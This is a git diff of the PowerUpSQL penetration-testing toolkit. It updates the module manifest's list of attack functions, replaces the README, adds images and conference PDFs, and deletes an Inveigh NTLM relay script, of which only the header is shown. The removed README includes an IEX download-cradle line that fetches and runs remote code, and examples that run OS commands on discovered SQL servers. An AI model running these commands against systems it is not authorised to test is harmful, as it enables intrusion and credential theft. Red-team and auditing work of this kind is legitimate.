https://github.com/NetSPI/PowerUpSQL.' - PowerShellVersion = '3.0' + PowerShellVersion = '2.0' FunctionsToExport = @( 'Create-SQLFileXpDll', + 'Create-SQLFileCLRDll', + 'Get-SQLAgentJob', + 'Get-SQLAssemblyFile', 'Get-SQLAuditDatabaseSpec', 'Get-SQLAuditServerSpec', 'Get-SQLColumn', @@ -22,33 +25,64 @@ 'Get-SQLDatabaseRoleMember', 'Get-SQLDatabaseSchema', 'Get-SQLDatabaseThreaded', - 'Get-SQLDatabaseUser', + 'Get-SQLDatabaseUser', + 'Get-SQLDomainObject', + 'Get-SQLDomainComputer', + 'Get-SQLDomainUser', + 'Get-SQLDomainSubnet', + 'Get-SQLDomainSite', + 'Get-SQLDomainGroup', + 'Get-SQLDomainOu', + 'Get-SQLDomainAccountPolicy', + 'Get-SQLDomainTrust', + 'Get-SQLDomainPasswordsLAPS', + 'Get-SQLDomainController', + 'Get-SQLDomainExploitableSystem', + 'Get-SQLDomainGroupMember', 'Get-SQLFuzzDatabaseName', 'Get-SQLFuzzDomainAccount', 'Get-SQLFuzzObjectName', 'Get-SQLFuzzServerLogin' + 'Get-SQLInstanceBroadcast', 'Get-SQLInstanceDomain', 'Get-SQLInstanceFile', 'Get-SQLInstanceLocal', 'Get-SQLInstanceScanUDP', 'Get-SQLInstanceScanUDPThreaded', + 'Get-SQLLocalAdminCheck', + 'Get-SQLPersistRegRun', + 'Get-SQLPersistRegDebugger', + 'Get-SQLPersistTriggerDDL', + 'Get-SQLOleDbProvder', 'Get-SQLQuery', 'Get-SQLQueryThreaded', + 'Get-SQLRecoverPwAutoLogon', 'Get-SQLServerConfiguration', 'Get-SQLServerCredential', 'Get-SQLServerInfo', 'Get-SQLServerInfoThreaded', 'Get-SQLServerLink', + 'Get-SQLServerLinkCrawl', + 'Get-SQLServerLinkData', + 'Get-SQLServerLinkQuery', 'Get-SQLServerLogin', + 'Get-SQLServerLoginDefaultPw', + 'Get-SQLServerPasswordHash', + 'Get-SQLServerPolicy', 'Get-SQLServerPriv', 'Get-SQLServerRole', 'Get-SQLServerRoleMember', 'Get-SQLServiceAccount', 'Get-SQLServiceLocal', 'Get-SQLSession', - 'Get-SQLStoredProcedure', + 'Get-SQLStoredProcedure', + 'Get-SQLStoredProcedureCLR', + 'Get-SQLStoredProcedureSQLi', + 'Get-SQLStoredProcedureAutoExec', + 'Get-SQLStoredProcedureXp', 'Get-SQLSysadminCheck', 'Get-SQLTable', + 'Get-SQLTableTemp', 'Get-SQLTriggerDdl', 'Get-SQLTriggerDml', 'Get-SQLView', @@ -64,11 +98,25 @@ 'Invoke-SQLAuditRoleDbOwner', 'Invoke-SQLAuditSampleDataByColumn', 'Invoke-SQLAuditWeakLoginPw', + 'Invoke-SQLAuditSQLiSpExecuteAs', + 'Invoke-SQLAuditSQLiSpSigned', + 'Invoke-SQLAuditDefaultLoginPw', + 'Invoke-SQLAuditPrivAutoExecSp', 'Invoke-SQLDumpInfo', 'Invoke-SQLEscalatePriv', - 'Invoke-SQLOSCmd' + 'Invoke-SQLImpersonateService', + 'Invoke-SQLImpersonateServiceCmd', + 'Invoke-SQLUncPathInjection', + 'Invoke-SQLOSCmd', + 'Invoke-SQLOSCmdCLR', + 'Invoke-SQLOSCmdCOle', + 'Invoke-SQLOSCmdPython', + 'Invoke-SQLOSCmdR', + 'Invoke-SQLOSCmdAgentJob', + 'Invoke-TokenManipulation', + 'Get-DomainObject', + 'Get-DomainSpn' ) FileList = 'PowerUpSQL.psm1', 'PowerUpSQL.ps1', 'README.md' } - diff --git a/README.md b/README.md index 8ebc5c1..cdc218e 100644 --- a/README.md +++ b/README.md @@ -1,332 +1,41 @@ -## ![alt tag](https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/scripts/PowerUpSQL-LogoSm.png) PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server - -[![licence badge]][licence] -[![stars badge]][stars] -[![forks badge]][forks] -[![issues badge]][issues] +   +[![licence badge]][licence] +[![wiki Badge]][wiki] +[![stars badge]][stars] +[![forks badge]][forks] +[![issues badge]][issues] [licence badge]:https://img.shields.io/badge/license-New%20BSD-blue.svg [stars badge]:https://img.shields.io/github/stars/NetSPI/PowerUpSQL.svg [forks badge]:https://img.shields.io/github/forks/NetSPI/PowerUpSQL.svg [issues badge]:https://img.shields.io/github/issues/NetSPI/PowerUpSQL.svg +[wiki badge]:https://img.shields.io/badge/PowerUpSQL-Wiki-green.svg [licence]:https://github.com/NetSPI/PowerUpSQL/blob/master/LICENSE [stars]:https://github.com/NetSPI/PowerUpSQL/stargazers [forks]:https://github.com/NetSPI/PowerUpSQL/network [issues]:https://github.com/NetSPI/PowerUpSQL/issues +[wiki]:https://github.com/NetSPI/PowerUpSQL/wiki +![PowerUpSQLLogo](https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/images/PowerUpSQL_GitHub4.png) -The PowerUpSQL module includes functions that support SQL Server discovery, auditing for common weak configurations, and privilege escalation on scale. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that could be used by administrators to quickly inventory the SQL Servers in their ADS domain. - -PowerUpSQL was designed with six objectives in mind: -* Easy Server Discovery: Discovery functions can be used to blindly identify local, domain, and non-domain SQL Server instances on scale. -* Easy Server Auditing: The Invoke-SQLAudit function can be used to audit for common high impact vulnerabilities and weak configurations using the current login's privileges. Also, Invoke-SQLDumpInfo can be used to quickly inventory databases, privileges, and other information. -* Easy Server Exploitation: The Invoke-SQLEscalatePriv function attempts to obtain sysadmin privileges using identified vulnerabilities. -* Scalability: Multi-threading is supported on core functions so they can be executed against many SQL Servers quickly. -* Flexibility: PowerUpSQL functions support the PowerShell pipeline so they can be used together, and with other scripts. -* Portability: Default .net libraries are used and there are no dependencies on SQLPS or the SMO libraries. Functions have also been designed so they can be run independently. As a result, it's easy to use on any Windows system with PowerShell v3 installed. - - -### Module Information -* Author: Scott Sutherland (@_nullbind), NetSPI - 2016 -* Contributors: Antti Rantasaari and Eric Gruber (@egru) -* License: BSD 3-Clause -* Required Dependencies: PowerShell v.3 - -### Installing the Module -* Option 1: Install it from the PowerShell Gallery. This requires local administrative privileges and will permanently install the module. - - `Install-Module -Name PowerUpSQL` - -* Option 2: Download the project and import it. This does not require administrative privileges and will only be imported into the current session. However, it may be blocked by restrictive execution policies. - - `Import-Module PowerUpSQL.psd1` -* Option 3: Load it into a session via a download cradle. This does not require administrative privileges and will only be imported into the current session. It should not be blocked by executions policies. - - `IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")` - - Note: To run as an alternative domain user, use the runas command to launch PowerShell first. - - `runas /noprofile /netonly /user:domain\user PowerShell.exe` - -### Getting Command Help -* To list functions from the module, type: `Get-Command -Module PowerUpSQL` -* To list help for a function, type: `Get-Help FunctionName` - -Below are the functions included in this module. I've provided a list of the ones completed so far, but I've also outlined the intended development roadmap. The high level roadmap includes adding functions, adding multi-threading to all common functions, and testing against SQL Server version 2000 to 2014. At the moment most of the testing was done on versions 2008-2014. Also, as a general note, use the verbose flag to monitor the progress of executing functions. - -### Discovery Functions - -These functions can be used for enumerating SQL Server instances. Discovered instances can then be piped into other PowerUpSQL functions. - -|Function Name|Description | -|:--------------------------------|:-----------| -|Get-SQLInstanceFile|Returns SQL Server instances from a file. One per line.| -|Get-SQLInstanceLocal|Returns SQL Server instances from the local system based on a registry search.| -|Get-SQLInstanceDomain|Returns a list of SQL Server instances discovered by querying a domain controller for systems with registered MSSQL service principal names. The function will default to the current user's domain and logon server, but an alternative domain controller can be provided. UDP scanning of management servers is optional.| -|Get-SQLInstanceScanUDP|Returns SQL Server instances from UDP scan results.| -|Get-SQLInstanceScanUDPThreaded|Returns SQL Server instances from UDP scan results and supports threading.| - -**Examples:** - - Get-SQLInstanceDomain -Verbose | Get-SQLServerInfo -Verbose - Get-SQLInstanceLocal -Verbose | Get-SQLServerInfo -Verbose - Get-SQLServerInfo -Verbose -Instance "SQLSERVER1\MYINSTANCE" - Get-SQLServerInfo -Verbose -Instance "SQLSERVER1\MYINSTANCE" -Username MyUser -Password MyPassword - Get-SQLServerInfo -Verbose -Instance "SQLSERVER1\MYINSTANCE" -Credential MyUser - -**Roadmap:** - - Get-SQLInstanceScanTCP - Returns SQL Server instances from TCP scan results. - Get-SQLInstanceBroadcast - Returns SQL Server instances from UDP broadcast. - -### Primary Attack Functions - -These are the functions used to quickly dump database information, audit for common vulnerabilities, and attempt to obtain sysadmin privileges. - -|Function Name |Description | -|:-----------------------------|:-----------| -|Invoke-SQLDumpInfo|This can be used to dump SQL Server and database information to csv or xml files. This can be handy for doing a quick inventory of databases, logins, privileges etc.| -|Invoke-SQLAudit|This can be used to review the SQL Server and databases for common configuration weaknesses and provide a vulnerability report along with recommendations for each item.| -|Invoke-SQLEscalatePriv|This can be used to obtain sysadmin privileges via identified configuration weaknesses.| - -**Examples:** - - Get-SQLInstanceDomain -Verbose | Invoke-SQLDumpInfo -Verbose - Get-SQLInstanceLocal -Verbose | Invoke-SQLAudit -Verbose - Invoke-SQLEscalatePriv -Verbose -Instance "SQLSERVER1\MyInstance" -Username MyUser -Password MyPassword - - -### Core Functions - -These functions are used to test connections, execute SQL Server queries, and execute OS commands. All other functions use these core functions. However, they can also be executed independently. - -|Function Name |Description | -|:-----------------------------|:-----------| -|Get-SQLConnectionTest|Tests if the current Windows account or provided SQL Server login can log into an SQL Server. -|Get-SQLConnectionTestThreaded|Tests if the current Windows account or provided SQL Server login can log into an SQL Server and supports threading.| -|Get-SQLQuery|Executes a query on target SQL servers.| -|Get-SQLQueryThreaded|Executes a query on target SQL servers and supports threading.| -|Invoke-SQLOSCmd|Execute command on the operating system as the SQL Server service account using xp_cmdshell. Supports threading, raw output, and table output.| - -**Examples:** - - Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 - Get-SQLInstanceDomain -Verbose | Invoke-SQLOSCmd -Verbose -Threads 10 -Command "whoami" - -### Common Functions - -These functions are used for common information gathering tasks. Similar to core functions, the common functions can be executed by themselves, but are also used by other functions in the PowerUpSQL module. - -|Function Name |Description | -|:-----------------------------|:-----------| -|Get-SQLAuditDatabaseSpec|Returns Audit database specifications from target SQL Servers.| -|Get-SQLAuditServerSpec|Returns Audit server specifications from target SQL Servers.| -|Get-SQLColumn|Returns column information from target SQL Servers. Supports keyword search.| -|Get-SQLColumnSampleData|Returns column information from target SQL Servers. Supports search by keywords, sampling data, and validating credit card numbers.| -|Get-SQLColumnSampleDataThreaded|Returns column information from target SQL Servers. Supports search by keywords, sampling data, and validating credit card numbers. Supports host threading.| -|Get-SQLDatabase|Returns database information from target SQL Servers.| -|Get-SQLDatabase|Returns database information from target SQL Servers. Supports host threading.| -|Get-SQLDatabasePriv|Returns database user privilege information from target SQL Servers.| -|Get-SQLDatabaseRole|Returns database role information from target SQL Servers.| -|Get-SQLDatabaseRoleMember|Returns database role member information from target SQL Servers.| -|Get-SQLDatabaseSchema|Returns schema information from target SQL Servers. | -|Get-SQLDatabaseUser|Returns database user information from target SQL Servers.| -|Get-SQLServerConfiguration|Returns configuration settings from sp_configure. Output includes advanced options if the connecting user is a sysadmin.| -|Get-SQLServerCredential|Returns credentials from target SQL Servers.| -|Get-SQLServerInfo|Returns basic server and user information from target SQL Servers.| -|Get-SQLServerInfoThreaded|Returns basic server and user information from target SQL Servers. Supports host threading.| -|Get-SQLServerLink|Returns link servers from target SQL Servers.| -|Get-SQLServerLogin|Returns logins from target SQL Servers.| -|Get-SQLServerPriv|Returns SQL Server login privilege information from target SQL Servers.| -|Get-SQLServerRole|Returns SQL Server role information from target SQL Servers.| -|Get-SQLServerRoleMember|Returns SQL Server role member information from target SQL Servers.| -|Get-SQLServiceAccount|Returns a list of service account names for SQL Servers services by querying the registry with xp_regread. This can be executed against remote systems.| -|Get-SQLSession|Returns active sessions from target SQL Servers.| -|Get-SQLStoredProcure|Returns stored procedures from target SQL Servers.| -|Get-SQLSysadminCheck|Check if login is has sysadmin privilege on the target SQL Servers.| -|Get-SQLTable|Returns table information from target SQL Servers.| -|Get-SQLTriggerDdl|Returns DDL trigger information from target SQL Servers. This includes logon triggers.| -|Get-SQLTriggerDml|Returns DML trigger information from target SQL Servers.| -|Get-SQLView|Returns view information from target SQL Servers.| - -**Examples:** - - Get-SQLInstanceLocal | Get-SQLDatabase -Verbose -NoDefaults - Get-SQLInstanceLocal | Get-SQLColumnSampleData -Keywords "account,credit,card" -SampleSize 5 -ValidateCC - -**Roadmap:** - - Get-SQLProxyAccount - Returns proxy accounts from target SQL Servers. - Get-SQLTempObject - Returns temp objects from target SQL Servers. - Get-SQLCachePlan - Returns cache plans from target SQL Servers. - Get-SQLQueryHistory - Returns recent query history from target SQL Servers. - Get-SQLHiddenSystemObject - Returns hidden system objects from target SQL Servers. - -### Audit Functions - -These functions are used for identifying weak configurations that can lead to unauthorized access. Invoke-SQLAudit can be used to run all of them at once. Also, all of the audit functions support an exploit flag. In most cases that means the script will try to add your login to the sysadmin server role. - -|Function Name |Description |Obtains Sysadmin Privs| -|:-----------------------------|:-----------|:---------| -|Invoke-SQLAuditPrivCreateProcedure|Check if the current login has the CREATE PROCEDURE permission. Attempt to use permission to obtain sysadmin privileges.|No| -|Invoke-SQLAuditPrivImpersonateLogin|Check if the current login has the IMPERSONATE permission on any sysadmin logins. Attempt to use permission to obtain sysadmin privileges.|Yes| -|Invoke-SQLAuditPrivServerLink|Check if SQL Server links exist that are preconfigured with alternative credentials that can be impersonated. Provide example queries for execution on remote servers.|Yes| -Invoke-SQLAuditPrivDbChaining|Check if database ownership chaining is enabled at the server or databases levels.|No| -|Invoke-SQLAuditPrivTrustworthy|Check if any database have been flagged as trusted.|No| -|Invoke-SQLAuditPrivXpDirtree|Checks if the xp_dirtree stored procedure is executable. Uses Inveigh to obtain password hash for the SQL Server service account. Note: Capture likelihood is better when longer timeouts are set.|Yes| -|Invoke-SQLAuditPrivXpFileexist|Checks if the xp_fileexist stored procedure is executable. Uses Inveigh to obtain password hash for the SQL Server service account. Note: Capture likelihood is better when longer timeouts are set.|Yes| -|Invoke-SQLAuditRoleDbDdlAdmin|Check if the current login has the DB_DdlAdmin role in any databases. Attempt to use permission to obtain sysadmin privileges.|No| -|Invoke-SQLAuditRoleDbOwner|Check if the current login has the DB_OWNER role in any databases. Attempt to use permission to obtain sysadmin privileges.|Yes| -|Invoke-SQLAuditSampleDataByColumn|Check if the current login can access any database columns that contain the word password. Supports column name keyword search and custom data sample size. For better data searches use Get-SQLColumnSampleData.|No| -|Invoke-SQLAuditWeakLoginPw|This can be used for online dictionary attacks. It also support auto-discovery of SQL Logins for testing if you already have a least privilege account.|Yes| - -**Examples:** - - Get-SQLInstanceLocal | Invoke-SQLAuditPrivImpersonateLogin -Verbose - -**Roadmap:** - - Create-SqlAuditPrivCreateStartUpProc - Invoke-SQLAuditCrawlOwnershipChain - Invoke-SQLAuditCrawlServerLink - Invoke-SQLAuditDictionaryAttackOffline - Invoke-SQLAuditDictionaryAttackOnline - Invoke-SQLAuditImpersonateDatabaseUser - Invoke-SQLAuditPrivAdministerBulkOps - Invoke-SQLAuditPrivAgentJob - Invoke-SQLAuditPrivAlterAssembly - Invoke-SQLAuditPrivAlterServerLogin - Invoke-SQLAuditPrivAlterServerRole - Invoke-SQLAuditPrivControlServer - Invoke-SQLAuditPrivControlServer - Invoke-SQLAuditPrivCreateAssembly -CLR -Binary -C - Invoke-SQLAuditPrivCreateStartUpSP - Invoke-SQLAuditPrivCreateTriggerDDL - Invoke-SQLAuditPrivCreateTriggerDML - Invoke-SQLAuditPrivCreateTriggerLOGON - Invoke-SQLAuditPrivExternalAssembly - Invoke-SqlAuditPrivInjectUncPath - https://github.com/nullbind/Powershellery/blob/master/Stable-ish/MSSQL/Get-SQLServiceAccountPwHash.ps1 - Invoke-SqlAuditPrivXpCmdshell - Invoke-SQLAuditRoledbAccessAdmin - Invoke-SQLAuditRoledbSecurityAdmin - Invoke-SQLAuditSQLi-ImpersonateDatabaseUser - https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/ - Invoke-SQLAuditSQLi-ImpersonateLogin - https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/ - Invoke-SQLAuditSQLi-ImpersonateSignedSp - https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/ - Invoke-SQLOSAdmintoSysadmin - https://github.com/nullbind/Powershellery/blob/master/Stable-ish/MSSQL/Invoke-SqlServerServiceImpersonation-Cmd.ps1 - - -### Persistence Functions - -These functions are used for maintaining access to the SQL Server using various methods. The roadmap for development is below. I've included a few links to standalone scripts that have not been integrated yet. - -**Roadmap:** - - Get-SQLPersistAssembly - Get-SQLPersistSp - Get-SQLPersistSpStartup - https://github.com/nullbind/Powershellery/blob/master/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1 - Get-SQLPersistTriggerDml - Get-SQLPersistTriggerDdl - https://github.com/nullbind/Powershellery/blob/master/Stable-ish/MSSQL/Invoke-SqlServer-Persist-TriggerDDL.psm1 - Get-SQLPersistTriggerLogon - https://github.com/nullbind/Powershellery/blob/master/Stable-ish/MSSQL/Invoke-SqlServer-Persist-TriggerLogon.psm1 - Get-SQLPersistView - Get-SQLPersistInternalObject - Get-SQLPersistAgentJob - Get-SQLPersistXstatus - Get-SQLPersistSkeletonKey - Get-SQLPersistFullPrivLogin - Get-SQLPersistImpersonateSysadmin - -### Password Recovery Functions - -These functions are used for recovering authentication tokens of varous types. The roadmap for development is below. I've included a few links to standalone scripts that have not been integrated yet. - -**Roadmap:** - - Get-SQLRecoverPwCredential - https://github.com/NetSPI/Powershell-Modules/blob/master/Get-MSSQLAllCredentials.psm1 - Get-SQLRecoverPwServerLink - https://github.com/NetSPI/Powershell-Modules/blob/master/Get-MSSQLLinkPasswords.psm1 - Get-SQLRecoverPWProxyAccount - https://github.com/NetSPI/Powershell-Modules/blob/master/Get-MSSQLAllCredentials.psm1 - Get-SQLRecoverLoginHash - Get-SQLRecoverMasterKey - Get-SQLRecoverMachineKey - Get-SQLRecoverPwAutoLogon - Get-SQLRecoverPwLsaSecrets - Get-SQLRecoverPwLogonOn - -### Data Exfiltration Functions - -These functions are used for exfiltrating data out of SQL Server. The roadmap for development is below. - -**Roadmap:** - - Get-SQLExfilHttp - Get-SQLExfilHttps - Get-SQLExfilDns - Get-SQLExfilSmb - Get-SQLExfilSmtp - Get-SQLExfilFtp - Get-SQLExfilServerLink - Get-SQLExfilAdHocQuery - -### Utility Functions - -These are essentially helper functions. Some of them are used by other PowerUpSQL functions, but all of them can be run independently. - -|Function Name |Description | -|:-----------------------------|:-----------| -|Get-SQLConnectionObject | Creates a object for connecting to SQL Server.| -|Get-SQLFuzzObjectName | Enumerates objects based on object id using OBJECT_NAME() and only the Public role.| -|Get-SQLFuzzDatabaseName | Enumerates databases based on database id using DB_NAME() and only the Public role.| -|Get-SQLFuzzServerLogin | Enumerates SQL Server Logins based on login id using SUSER_NAME() and only the Public role.| -|Get-SQLFuzzDomainAccount | Enumerates domain groups, computer accounts, and user accounts based on domain RID using SUSER_SNAME() and only the Public role. Note: In a typical domain 10000 or more is recommended for the EndId.| -|Get-ComputerNameFromInstance | Parses computer name from a provided instance.| -|Get-SQLServiceLocal | Returns local SQL Server services.| -|Create-SQLFileXpDll | Used to create CPP DLLs with exported functions that can be imported as extended stored procedures in SQL Server. Supports arbitrary command execution.| -|Get-DomainSpn | Returns a list of SPNs for the target domain. Supports authentication from non domain systems.| -|Get-DomainObject | Used to query domain controllers via LDAP. Supports alternative credentials from non-domain system.| - -**Examples:** +PowerUpSQL includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation on scale, and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server. - Get-SQLFuzzServerLogin -Verbose -Instance "SQLSVR1\Instance1" +### PowerUpSQL Wiki +For setup instructions, cheat Sheets, blogs, function overviews, and usage information check out the wiki: https://github.com/NetSPI/PowerUpSQL/wiki -**Roadmap:** +### Author and Contributors +* Author: Scott Sutherland (@_nullbind) ![Twitter Follow](https://img.shields.io/twitter/follow/_nullbind.svg?style=social) +* Major Contributors: Antti Rantasaari, Eric Gruber (@egru), Thomas Elling (@thomaselling) +* Contributors: Alexander Leary (@0xbadjuju), @leoloobeek, Andrew Luke(@Sw4mpf0x), Mike Manzotti (@mmanzo_), @TVqQAAMA, @cobbr_io, @mariuszbit (mgeeky), @0xe7 (@exploitph), phackt(@phackt_ul), @vsamiamv, and @ktaranov - Get-SQLDatabaseOrphanUser - Get-SQLDatabaseUser- add fuzzing option - Get-SQLDecryptedStoreProcedure - Get-SQLDownloadFile - Get-SQLDownloadFileAdHocQuery - Get-SQLDownloadFileAssembly - Get-SQLDownloadFileBulkInsert - Get-SQLDownloadFileServerLine - Get-SQLDownloadFileXpCmdshell - Get-SQLInstalledSoftware - Get-SQLServerLogin - add fuzzing option - Get-SQLUploadFile - Get-SQLUploadFileAdHocQuery - Get-SQLUploadFileAgent - Get-SQLUploadFileAssembly - Get-SQLUploadFileServerLink - Get-SQLUploadFileXpCmdshell - Invoke-SqlOSCmdAdHoQueryMd - Invoke-SqlOSCmdAgentActiveX - Invoke-SqlOSCmdAgentAnalysis - Invoke-SqlOSCmdAgentCmdExe - Invoke-SqlOSCmdAgentPs - Invoke-SqlOSCmdAgentVbscript - Invoke-SqlOSCmdAssembly - Invoke-SqlOSCmdServerLinkMd - Invoke-SqlOSCmdSsisExecuteProcessTask - Create-SQLFileCLRDll - Create-SQLFileXpDll +### Issue Reports -### Third Party Functions +I perform QA on functions before we publish them, but it's hard to consider every scenario. So I just wanted to say thanks to those of you that have taken the time to give me a heads up on issues with PowerUpSQL so that we can make it better. +* Bug Reporters: @ClementNotin, @runvirus, @CaledoniaProject, @christruncer, rvrsh3ll(@424f424f),@mubix (Rob Fuller) -A few PowerUpSQL functions use the third party functions below. -|Function Name |Description | -|:-----------------------------|:-----------| -|Invoke-Parallel|A PowerShell function created by Warren F. ( RamblingCookieMonster) for running multiple threads in PowerShell via runspaces. -|Invoke-Inveigh|A Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool create by Kevin Robertson.| -|Test-IsLuhnValid|Valdidate a number based on the Luhn Algorithm. Function written by Oyvind Kallstad.| +### License +* BSD 3-Clause diff --git a/images/2019_Blackhat_Shirt_Back.png b/images/2019_Blackhat_Shirt_Back.png new file mode 100644 index 0000000..9c6be4f Binary files /dev/null and b/images/2019_Blackhat_Shirt_Back.png differ diff --git a/images/2019_Blackhat_Shirt_Front.png b/images/2019_Blackhat_Shirt_Front.png new file mode 100644 index 0000000..e57b2d8 Binary files /dev/null and b/images/2019_Blackhat_Shirt_Front.png differ diff --git a/images/ADS_Query_AdHoc.png b/images/ADS_Query_AdHoc.png new file mode 100644 index 0000000..87d6dac Binary files /dev/null and b/images/ADS_Query_AdHoc.png differ diff --git a/images/ADS_Query_LinkServer.png b/images/ADS_Query_LinkServer.png new file mode 100644 index 0000000..58a2cf6 Binary files /dev/null and b/images/ADS_Query_LinkServer.png differ diff --git a/images/Background-NetSPI-HackResponsibly1000.png b/images/Background-NetSPI-HackResponsibly1000.png new file mode 100644 index 0000000..e987084 Binary files /dev/null and b/images/Background-NetSPI-HackResponsibly1000.png differ diff --git a/images/Background-NetSPI-HackResponsibly2600.png b/images/Background-NetSPI-HackResponsibly2600.png new file mode 100644 index 0000000..78f9ca9 Binary files /dev/null and b/images/Background-NetSPI-HackResponsibly2600.png differ diff --git a/images/NetSPI-HackRecklessly.png b/images/NetSPI-HackRecklessly.png new file mode 100644 index 0000000..790cb5f Binary files /dev/null and b/images/NetSPI-HackRecklessly.png differ diff --git a/images/NetSPI-HackResponsibly.png b/images/NetSPI-HackResponsibly.png new file mode 100644 index 0000000..8719a08 Binary files /dev/null and b/images/NetSPI-HackResponsibly.png differ diff --git a/images/PowerUpSQL_GitHub.png b/images/PowerUpSQL_GitHub.png new file mode 100644 index 0000000..f635127 Binary files /dev/null and b/images/PowerUpSQL_GitHub.png differ diff --git a/images/PowerUpSQL_GitHub2.png b/images/PowerUpSQL_GitHub2.png new file mode 100644 index 0000000..7328cba Binary files /dev/null and b/images/PowerUpSQL_GitHub2.png differ diff --git a/images/PowerUpSQL_GitHub3.png b/images/PowerUpSQL_GitHub3.png new file mode 100644 index 0000000..6bd193c Binary files /dev/null and b/images/PowerUpSQL_GitHub3.png differ diff --git a/images/PowerUpSQL_GitHub4.png b/images/PowerUpSQL_GitHub4.png new file mode 100644 index 0000000..d4c393a Binary files /dev/null and b/images/PowerUpSQL_GitHub4.png differ diff --git a/images/PowerUpSQL_GitHub5.png b/images/PowerUpSQL_GitHub5.png new file mode 100644 index 0000000..ba623b7 Binary files /dev/null and b/images/PowerUpSQL_GitHub5.png differ diff --git a/images/PowerUpsQL-2018-L.png b/images/PowerUpsQL-2018-L.png new file mode 100644 index 0000000..b165b6f Binary files /dev/null and b/images/PowerUpsQL-2018-L.png differ diff --git a/images/PowerUpsQL-2018-M.png b/images/PowerUpsQL-2018-M.png new file mode 100644 index 0000000..5e2a99e Binary files /dev/null and b/images/PowerUpsQL-2018-M.png differ diff --git a/images/PowerUpsQL-2018-S.png b/images/PowerUpsQL-2018-S.png new file mode 100644 index 0000000..fb4f6a2 Binary files /dev/null and b/images/PowerUpsQL-2018-S.png differ diff --git a/images/Unofficial.png b/images/Unofficial.png new file mode 100644 index 0000000..1afa31b Binary files /dev/null and b/images/Unofficial.png differ diff --git a/images/blackhat2018_PowerUpSQL_shirt.jpg b/images/blackhat2018_PowerUpSQL_shirt.jpg new file mode 100644 index 0000000..fa2b23c Binary files /dev/null and b/images/blackhat2018_PowerUpSQL_shirt.jpg differ diff --git a/images/blackhat2018_PowerUpSQL_stickers.jpg b/images/blackhat2018_PowerUpSQL_stickers.jpg new file mode 100644 index 0000000..50f8844 Binary files /dev/null and b/images/blackhat2018_PowerUpSQL_stickers.jpg differ diff --git a/images/powerupsql-large.png b/images/powerupsql-large.png new file mode 100644 index 0000000..14227b0 Binary files /dev/null and b/images/powerupsql-large.png differ diff --git a/images/powerupsql-small.png b/images/powerupsql-small.png new file mode 100644 index 0000000..665788c Binary files /dev/null and b/images/powerupsql-small.png differ diff --git a/images/readme.rd b/images/readme.rd new file mode 100644 index 0000000..9896575 --- /dev/null +++ b/images/readme.rd @@ -0,0 +1 @@ +This folder simply houses images for the Github repository. diff --git a/presentations/2012-AppSecUSA-SQL-Server-Exploitation-Escalation-and-Pilfering.pdf b/presentations/2012-AppSecUSA-SQL-Server-Exploitation-Escalation-and-Pilfering.pdf new file mode 100644 index 0000000..83cb1e1 Binary files /dev/null and b/presentations/2012-AppSecUSA-SQL-Server-Exploitation-Escalation-and-Pilfering.pdf differ diff --git a/presentations/2015-AppSecCali-10-Deadly-Sins-of-SQL-Server-Configuration.pdf b/presentations/2015-AppSecCali-10-Deadly-Sins-of-SQL-Server-Configuration.pdf new file mode 100644 index 0000000..da64d64 Binary files /dev/null and b/presentations/2015-AppSecCali-10-Deadly-Sins-of-SQL-Server-Configuration.pdf differ diff --git a/presentations/2016 DerbyCon - Hacking SQL Servers on Scale with PowerShell.pdf b/presentations/2016 DerbyCon - Hacking SQL Servers on Scale with PowerShell.pdf new file mode 100644 index 0000000..be62ff2 Binary files /dev/null and b/presentations/2016 DerbyCon - Hacking SQL Servers on Scale with PowerShell.pdf differ diff --git a/presentations/2017 DerbyCon - Beyond xp_cmdshell - Owning the Empire through SQL Server.pdf b/presentations/2017 DerbyCon - Beyond xp_cmdshell - Owning the Empire through SQL Server.pdf new file mode 100644 index 0000000..c9aef77 Binary files /dev/null and b/presentations/2017 DerbyCon - Beyond xp_cmdshell - Owning the Empire through SQL Server.pdf differ diff --git a/presentations/2018 BlackHat Arsenal - PowerUpSQL - A PowerShell Toolkit for Hacking SQL Servers on Scale.pdf b/presentations/2018 BlackHat Arsenal - PowerUpSQL - A PowerShell Toolkit for Hacking SQL Servers on Scale.pdf new file mode 100644 index 0000000..aea6a49 Binary files /dev/null and b/presentations/2018 BlackHat Arsenal - PowerUpSQL - A PowerShell Toolkit for Hacking SQL Servers on Scale.pdf differ diff --git a/presentations/2020-Troopers20-SQL Server Hacking Tips for Active Directory Environments_Final.pdf b/presentations/2020-Troopers20-SQL Server Hacking Tips for Active Directory Environments_Final.pdf new file mode 100644 index 0000000..ccd6c00 Binary files /dev/null and b/presentations/2020-Troopers20-SQL Server Hacking Tips for Active Directory Environments_Final.pdf differ diff --git a/scripts/Inveigh-Relay.ps1 b/scripts/Inveigh-Relay.ps1 deleted file mode 100644 index d3eb5b5..0000000 --- a/scripts/Inveigh-Relay.ps1 +++ /dev/null @@ -1,2084 +0,0 @@ -function Invoke-InveighRelay -{ -<# -.SYNOPSIS -Invoke-InveighRelay performs NTLMv2 HTTP to SMB relay with psexec style command execution. - -.DESCRIPTION -Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB relay with psexec style command execution. - - HTTP/HTTPS to SMB NTLMv2 relay with granular control - NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS - Granular control of console and file output - Can be executed as either a standalone function or through Invoke-Inveigh - -.PARAMETER HTTP -Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. - -.PARAMETER HTTPS -Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in -the local store and attached to port 443. If the script does not exit gracefully, execute -"netsh http delete sslcert 